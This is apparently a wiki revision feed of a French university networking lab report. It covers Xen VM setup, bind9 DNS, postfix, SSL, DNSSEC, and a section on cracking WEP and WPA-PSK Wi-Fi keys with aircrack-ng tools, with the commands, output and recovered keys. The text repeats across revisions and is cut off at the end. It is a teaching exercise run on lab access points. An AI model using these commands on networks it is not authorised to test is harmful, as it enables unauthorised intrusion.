&amp;lt;pre&amp;gt;dnssec-signzone -o orelsan.website -k orelsan.website-ksk ../orelsan.website/orelsan orelsan.website-zsk&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Cassage clé ==&lt;br /&gt;
Pour le crackage de clé, nous allons utiliser le package aircrack-ng qui est un ensemble d'outils permettant de tester la sécurité d'un réseau&lt;br /&gt;
=== Cassage de clé WEP ===&lt;br /&gt;
Commençons par detecter notre interface wifi par le biais d'un&lt;br /&gt;
&amp;lt;pre&amp;gt;ifconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
ou&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre interface est wlan2 qui correspond à la clé wifi ajoutée sur l'ordinateur.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons ainsi commencer à utiliser les outils de aircrack en debutant par &lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wlan2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette commande permet de mettre en mode moniteur notre interface wifi&lt;br /&gt;
Si tout se passe correctement, vous allez voir apparaitre&lt;br /&gt;
&amp;lt;pre&amp;gt;creation du mon0&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan2		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
				(monitor mode enabled on mon1)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous observons bien que le mode moniteur est activé pour notre wlan2.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons observer tous les réseaux grâce à la commande &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng wlan2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons repéré  la cracotte que nous voulons cracker on refait un airodump pour se focaliser sur cette cracotte&lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng  wlan2 -c 8 -essid cracotte03 --bssid 04:DA:D2:9C:50:52 -w crack&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
-c permet de le selectrionner le channel de communication&lt;br /&gt;
-w le nom du fichier dans lequel airodump va enregistrer les données&lt;br /&gt;
--bssid permet d'indiquer l'adresse mac de la cible &lt;br /&gt;
--essid permet d'indique le ssid de la cible (nom du réseau)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  8 ][ Elapsed: 1 min ][ 2016-11-21 15:08                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  -41  45      799    53316  506   8  54e. WEP  WEP         cracotte03                                             &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                           &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -28   54e-54e   222    60221&amp;lt;/pre&amp;gt;  &lt;br /&gt;
&lt;br /&gt;
On peut visualiser le nombre de paquets qui transit. &lt;br /&gt;
Pour permettre le crackage de la clé WEP, un nombre de data important est necessaire. Pour obtenir plus de data, nous pouvons utiliser la commande aireplay dans un autre terminal.&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Piranha:/home/pifou#aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52 wlan2&lt;br /&gt;
No source MAC (-h) specified. Using the device MAC (40:A5:EF:05:AA:25)&lt;br /&gt;
15:00:01  Waiting for beacon frame (BSSID: 04:DA:D2:9C:50:51) on channel 8&lt;br /&gt;
&lt;br /&gt;
15:00:01  Sending Authentication Request (Open System)&lt;br /&gt;
&lt;br /&gt;
15:00:03  Sending Authentication Request (Open System)&lt;br /&gt;
&lt;br /&gt;
15:00:05  Sending Authentication Request (Open System) [ACK]&lt;br /&gt;
15:00:05  Authentication successful&lt;br /&gt;
15:00:05  Sending Association Request [ACK]&lt;br /&gt;
15:00:05  Association successful :-) (AID: 1) &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et tout en laissant airodump ouvert sur un terminal, on vient trouver la clé WEP en utilisant la commande ci dessous dans un autre terminal&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Piranha:/home/pifou#aircrack-ng crack.cap &lt;br /&gt;
                                                            Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                                            [00:00:39] Tested 257766 keys (got 32866 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(46080) B9(39936) 70(39680) B2(39168) 86(38656) 11(38400) B4(38400) F2(38400) A1(38144) 24(37632) &lt;br /&gt;
    1    0/  1   EE(45824) 11(44544) 7B(42240) 05(40960) 93(40448) C4(40448) EE(40448) 1C(39168) 3E(39168) 42(38912) &lt;br /&gt;
    2    0/  1   EE(45568) 36(42240) 6A(42240) 0D(40192) DC(39680) 98(39424) F3(39424) 39(39168) 3E(38912) B6(38656) &lt;br /&gt;
    3    0/  1   EE(48640) 11(43520) 61(40448) E6(40448) 00(38912) 9C(38656) EF(38656) 30(38400) B7(38400) 2A(38144) &lt;br /&gt;
    4    0/  1   EE(42240) 77(40960) AA(39936) 86(39424) F2(39168) FE(39168) 95(38912) 69(38656) 73(38656) AF(38656) &lt;br /&gt;
    5    1/  2   EE(42752) A2(41728) 34(41216) 46(40448) 0B(39680) 50(39424) 6C(39168) BA(39168) 7D(38912) 66(38656) &lt;br /&gt;
    6    0/  1   EE(44032) 8D(43264) 9F(40960) A0(40960) 74(40704) 17(40448) 91(39936) 66(39424) 5A(39168) C4(38912) &lt;br /&gt;
    7    0/  1   EE(44032) 36(40192) 4D(39680) 3D(39168) BF(39168) EC(38912) 9D(38656) EF(38656) A9(38400) B4(38144) &lt;br /&gt;
    8    0/  1   EE(48128) 35(40448) C1(39680) 9E(39424) F3(39424) C8(39168) 36(38656) 2E(38144) 7A(38144) C5(38144) &lt;br /&gt;
    9    0/  1   EE(45312) 74(42496) E7(40960) 6C(40192) 28(39936) 1B(39680) AF(39680) 71(38656) 44(38400) 2C(37888) &lt;br /&gt;
   10    3/  1   62(39424) BC(39424) 48(39168) 56(38912) AF(38912) 23(38400) 98(38400) A7(38144) 2B(37888) 79(37888) &lt;br /&gt;
   11    5/  1   68(38656) E9(38656) F9(38656) 1E(38400) 36(38400) 5A(38144) 92(38144) 5C(37888) 87(37888) CB(37888) &lt;br /&gt;
   12    0/  2   79(40780) 62(40380) 4D(40156) 85(39388) DE(39280) 4E(39060) 98(38876) A7(38544) 6A(38432) 82(38144) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clé WPA-PSK ===&lt;br /&gt;
Le cassage de clé WPA est légèrement diffèrent de celui WEP. Nous utilisons les mêmes outils (aircrack-ng) mais nous devons fournir un dictionnaire avec tous les mots de passe. Dans notre cas, nous avons décidé de prendre une clé de 8 chiffres. &lt;br /&gt;
Nous utilisons pour commencer&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wlan2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Puis&lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng --encrypt wpa mon0 -c 6 -w Poney --bssid 30:5A:3A:15:F6:3F&amp;lt;/pre&amp;gt;&lt;br /&gt;
--encrypt permet de sélectionner le type d'encryption souhaité.&lt;br /&gt;
&amp;lt;pre&amp;gt; CH  6 ][ Elapsed: 2 mins ][ 2016-11-21 16:18 ][ WPA handshake: 30:5A:3A:15:F6:3F                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 30:5A:3A:15:F6:3F  -34 100      738     1323   26   6  54e  WPA2 CCMP   PSK  Poneyus                                                &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                           &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 30:5A:3A:15:F6:3F  74:29:AF:F3:FD:91  -16    1e- 1     75      265                                                                   &lt;br /&gt;
 30:5A:3A:15:F6:3F  04:DB:56:3D:FD:A2  -40    0e- 0e  4709     1367 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un appareil doit se connecter sur notre réseau pour pouvoir avoir l'option &amp;lt;i&amp;gt;handshake&amp;lt;/i&amp;gt;&lt;br /&gt;
&lt;br /&gt;
et nous pouvons utiliser la commande&lt;br /&gt;
&amp;lt;pre&amp;gt; aircrack-ng Poney.cap dico.txt&amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette commande va tester chaque mot de passe 1 par 1 présent dans notre fichier dico.txt &lt;br /&gt;
Et au bout d'une heure nous parvenons à retrouver la clé WPA .&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;                                 Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [01:01:16] 2857196 keys tested (792.44 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 02857193 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : E7 06 15 6B 6D BA 3F 42 AD 01 AF 05 DC A3 81 14 &lt;br /&gt;
                       D0 1A 64 4A B9 B3 C4 0B CF 4A 87 6F 80 FE 54 88 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : D1 40 F8 7B 0A 2E 00 9B DC 2D DE AD 1A 7A 19 07 &lt;br /&gt;
                       C5 D1 25 0C F3 18 3A 48 25 31 B0 57 40 93 41 30 &lt;br /&gt;
                       21 37 82 9F 56 2A 1A 97 F2 35 F3 F9 BC AF 42 14 &lt;br /&gt;
                       22 4B 49 EA 0A 2A 90 21 C9 F4 C0 13 80 1E 76 B2 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : B2 1E E7 D3 78 D6 1A 5F C8 36 63 E7 81 8B EE D1 &amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Jturut</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35650</id>
		<title>TP sysres IMA2a5 2016/2017 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35650"/>
				<updated>2016-12-06T10:14:41Z</updated>
		
		<summary type="html">&lt;p&gt;Jturut : /* Cassage de clé WPA-PSK */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{| class=&amp;quot;wikitable centre&amp;quot; width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! scope=col | N° VLAN&lt;br /&gt;
! scope=col | Prénom&lt;br /&gt;
! scope=col | Réseau local&lt;br /&gt;
! scope=col | Nom VM&lt;br /&gt;
! scope=col | @IP VM &lt;br /&gt;
|-&lt;br /&gt;
| VLAN20        &lt;br /&gt;
| Dimitri          &lt;br /&gt;
| 10.60.20.0/24&lt;br /&gt;
| Vald&lt;br /&gt;
|193.48.57.182/28&lt;br /&gt;
|-&lt;br /&gt;
|VLAN21           &lt;br /&gt;
| Nabil         &lt;br /&gt;
| 10.60.21.0/24&lt;br /&gt;
| Pnl&lt;br /&gt;
|193.48.57.177/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN22&lt;br /&gt;
| Otmane              &lt;br /&gt;
| 10.60.22.0/24&lt;br /&gt;
| Lartiste&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN23  &lt;br /&gt;
| Hugo               &lt;br /&gt;
| 10.60.23.0/24 &lt;br /&gt;
| Gradur&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN24 &lt;br /&gt;
| Clement              &lt;br /&gt;
| 10.60.24.0/24 &lt;br /&gt;
| Gringe&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN25   &lt;br /&gt;
| Joan            &lt;br /&gt;
| 10.60.25.0/24 &lt;br /&gt;
| Orelsan&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés Cisco ==&lt;br /&gt;
&lt;br /&gt;
== Installation d'une machine virtuelle ==&lt;br /&gt;
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.&lt;br /&gt;
Pour créer la machine virtuel, on tape la commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt; xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier &amp;lt;i&amp;gt;orelsan.cfg&amp;lt;/i&amp;gt; en remplaçant la version 3.14 en 3.16.0 &lt;br /&gt;
&amp;lt;pre&amp;gt; kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
 extra       = 'elevator=noop'&lt;br /&gt;
 ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lancement de notre machine virtuelle &lt;br /&gt;
&amp;lt;pre&amp;gt; xl create Orelsan.cvg &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Connection à notre machine virtuelle&lt;br /&gt;
&amp;lt;pre&amp;gt; xl console Orelsan &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :&lt;br /&gt;
&amp;lt;pre&amp;gt; xl list &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois la connexion sur notre machine établie, nous devons changer le fichier &amp;lt;i&amp;gt;interfaces&amp;lt;/i&amp;gt; pour permettre une connexion à internet:&lt;br /&gt;
&amp;lt;pre&amp;gt;# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
        address 193.48.57.181&lt;br /&gt;
        netmask 255.255.255.240&lt;br /&gt;
        gateway 193.48.57.190&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis pour prendre en compte ses modifications nous utilisons :&lt;br /&gt;
&amp;lt;pre&amp;gt;ifdown&lt;br /&gt;
ifup&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install vim &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du service internet ==&lt;br /&gt;
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP&lt;br /&gt;
&lt;br /&gt;
=== Installation du serveur HTTP ===&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install apache2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Installation du serveur DNS ===&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install bind9 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si cette installation vous indique une erreur, il faut modifier le fichier  &amp;lt;i&amp;gt;/etc/apt/apt.conf.d/01proxy&amp;lt;/i&amp;gt;&lt;br /&gt;
et remplacer &lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://proxy.polytech-lille.fr:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
par&lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://helfaut.escaut.net:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette modification est du a la modification du proxy de l'école.&lt;br /&gt;
&lt;br /&gt;
===Configuration de notre nom de domaine===&lt;br /&gt;
&lt;br /&gt;
Après l'achat de notre nom de domaine &amp;lt;i&amp;gt;orelsan.website&amp;lt;/i&amp;gt; sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine&lt;br /&gt;
dns.orelsan.webiste -&amp;gt; 193.48.57.181&lt;br /&gt;
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.&lt;br /&gt;
Puis nous allons modifier 3 fichiers :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;options {&lt;br /&gt;
   allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   217.70.177.40/32 ; //passerelle de gandi  par defaut&lt;br /&gt;
 };&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.local &amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;//&lt;br /&gt;
// Do any local configuration here&lt;br /&gt;
//&lt;br /&gt;
&lt;br /&gt;
// Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
// organization&lt;br /&gt;
//include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;orelsan.website&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/orelsan.website/orelsan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/orelsan.website/orelsan&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$TTL 259200&lt;br /&gt;
@ IN SOA dns postmaster.orelsan.website. (&lt;br /&gt;
        20               ; Version&lt;br /&gt;
        7200             ; Refresh (2h)&lt;br /&gt;
        3600             ; Retry   (1h)&lt;br /&gt;
        1209600          ; Expire (14j)&lt;br /&gt;
        259200 )         ; Minimum TTL (3j)&lt;br /&gt;
         IN NS dns&lt;br /&gt;
         IN NS ns6.gandi.net.&lt;br /&gt;
         IN A       193.48.57.181&lt;br /&gt;
         IN MX      100 dns&lt;br /&gt;
&lt;br /&gt;
dns     IN A       193.48.57.181&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 stop&lt;br /&gt;
service bind9 start&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;cat /var/log/daemon.log&amp;lt;/i&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement&lt;br /&gt;
Si tout cela fonctionne on peut se rendre sur notre page.&lt;br /&gt;
Pour modifier les informations visible sur la page, il suffit d'aller dans &lt;br /&gt;
&amp;lt;i&amp;gt;/var/www/html/index.html&amp;lt;/i&amp;gt;. Toutes les informations écrites dans ce fichier seront visible sur notre page.&lt;br /&gt;
&lt;br /&gt;
===Installation boite mail===&lt;br /&gt;
&lt;br /&gt;
On commence par un installer postfix qui est un serveur de messagerie électronique.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install postfix&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;i&amp;gt;/etc/aliases&amp;lt;/i&amp;gt; on ajoute:&lt;br /&gt;
&amp;lt;pre&amp;gt;admin:root&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis on utilise la commande&lt;br /&gt;
&amp;lt;pre&amp;gt;newaliases&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install bsd-mailx&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et pour observer nos mail, on tape la commande &amp;lt;i&amp;gt;mail&amp;lt;/i&amp;gt; dans la console.&lt;br /&gt;
L'adresse mail est admin@orelsan.website.&lt;br /&gt;
&lt;br /&gt;
===Générer une demande de certificat en SHA 2===&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr&lt;br /&gt;
&lt;br /&gt;
Country Name (2 letter code) [AU]:fr&lt;br /&gt;
State or Province Name (full name) [Some-State]:North&lt;br /&gt;
Locality Name (eg, city) []:Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech&lt;br /&gt;
Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website&lt;br /&gt;
Email Address []:admin@orelsan.website&lt;br /&gt;
&lt;br /&gt;
Please enter the following 'extra' attributes&lt;br /&gt;
to be sent with your certificate request&lt;br /&gt;
A challenge password []:&lt;br /&gt;
An optional company name []:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette fonction nous crée 2 fichiers :&lt;br /&gt;
monserveur.key	serveur.csr&lt;br /&gt;
&lt;br /&gt;
-monserveur.key contient la clé privée.&lt;br /&gt;
&lt;br /&gt;
-serveur.csr contient la clé public.&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat.&lt;br /&gt;
On crée 2 fichier avec :&lt;br /&gt;
&lt;br /&gt;
-inter.crt qui contient le certificat intermédiaire.&lt;br /&gt;
&lt;br /&gt;
-gandi.crt qui qui contient le certificat .&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Orelsan:~# ls&lt;br /&gt;
gandi.crt  inter.crt  mbox  monserveur.key  serveur.csr&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &amp;lt;i&amp;gt;/etc/apache2/sites-enabled/000-default.conf&amp;lt;/i&amp;gt; on écrit: &lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
&lt;br /&gt;
        ServerName www.orelsan.website&lt;br /&gt;
        ServerAlias orelsan.website&lt;br /&gt;
        DocumentRoot /var/www/html&lt;br /&gt;
        CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
        SSLEngine on&lt;br /&gt;
	SLCertificateFile /root/gandi.crt&lt;br /&gt;
        SSLCertificateKeyFile /root/monserveur.key&lt;br /&gt;
        SSLCertificateChainFile /root/inter.crt&lt;br /&gt;
	SSLVerifyClient None&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous ajoutons l'option ci dessous dans le fichier &amp;lt;i&amp;gt;named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-enable yes &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans un répertoire, nous créons d'abord la clé asymétrique de signature puis celle de zone :&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE orelsan.website &lt;br /&gt;
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE orelsan.website&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après avoir renommé les noms de nos clé, nous ajoutons dans notre fichier de zone &lt;br /&gt;
&amp;lt;pre&amp;gt;$include /etc/bind/orelsan.website.dnssec/orelsan.website-ksk.key&lt;br /&gt;
$include /etc/bind/orelsan.website.dnssec/orelsan.website-zsk.key &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
et pour signez les enregistrements de la zone, nous utilisons la commande :&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-signzone -o orelsan.website -k orelsan.website-ksk ../orelsan.website/orelsan orelsan.website-zsk&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Cassage clé ==&lt;br /&gt;
Pour le crackage de clé, nous allons utiliser le package aircrack-ng qui est un ensemble d'outils permettant de tester la sécurité d'un réseau&lt;br /&gt;
=== Cassage de clé WEP ===&lt;br /&gt;
Commençons par detecter notre interface wifi par le biais d'un&lt;br /&gt;
&amp;lt;pre&amp;gt;ifconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
ou&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre interface est wlan2 qui correspond à la clé wifi ajoutée sur l'ordinateur.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons ainsi commencer à utiliser les outils de aircrack en debutant par &lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wlan2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette commande permet de mettre en mode moniteur notre interface wifi&lt;br /&gt;
Si tout se passe correctement, vous allez voir apparaitre&lt;br /&gt;
&amp;lt;pre&amp;gt;creation du mon0&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan2		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
				(monitor mode enabled on mon1)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous observons bien que le mode moniteur est activé pour notre wlan2.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons observer tous les réseaux grâce à la commande &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng wlan2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons repéré  la cracotte que nous voulons cracker on refait un airodump pour se focaliser sur cette cracotte&lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng  wlan2 -c 8 -essid cracotte03 --bssid 04:DA:D2:9C:50:52 -w crack&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
-c permet de le selectrionner le channel de communication&lt;br /&gt;
-w le nom du fichier dans lequel airodump va enregistrer les données&lt;br /&gt;
--bssid permet d'indiquer l'adresse mac de la cible &lt;br /&gt;
--essid permet d'indique le ssid de la cible (nom du réseau)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  8 ][ Elapsed: 1 min ][ 2016-11-21 15:08                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  -41  45      799    53316  506   8  54e. WEP  WEP         cracotte03                                             &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                           &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -28   54e-54e   222    60221&amp;lt;/pre&amp;gt;  &lt;br /&gt;
&lt;br /&gt;
On peut visualiser le nombre de paquets qui transit. &lt;br /&gt;
Pour permettre le crackage de la clé WEP, un nombre de data important est necessaire. Pour obtenir plus de data, nous pouvons utiliser la commande aireplay dans un autre terminal.&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Piranha:/home/pifou#aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52 wlan2&lt;br /&gt;
No source MAC (-h) specified. Using the device MAC (40:A5:EF:05:AA:25)&lt;br /&gt;
15:00:01  Waiting for beacon frame (BSSID: 04:DA:D2:9C:50:51) on channel 8&lt;br /&gt;
&lt;br /&gt;
15:00:01  Sending Authentication Request (Open System)&lt;br /&gt;
&lt;br /&gt;
15:00:03  Sending Authentication Request (Open System)&lt;br /&gt;
&lt;br /&gt;
15:00:05  Sending Authentication Request (Open System) [ACK]&lt;br /&gt;
15:00:05  Authentication successful&lt;br /&gt;
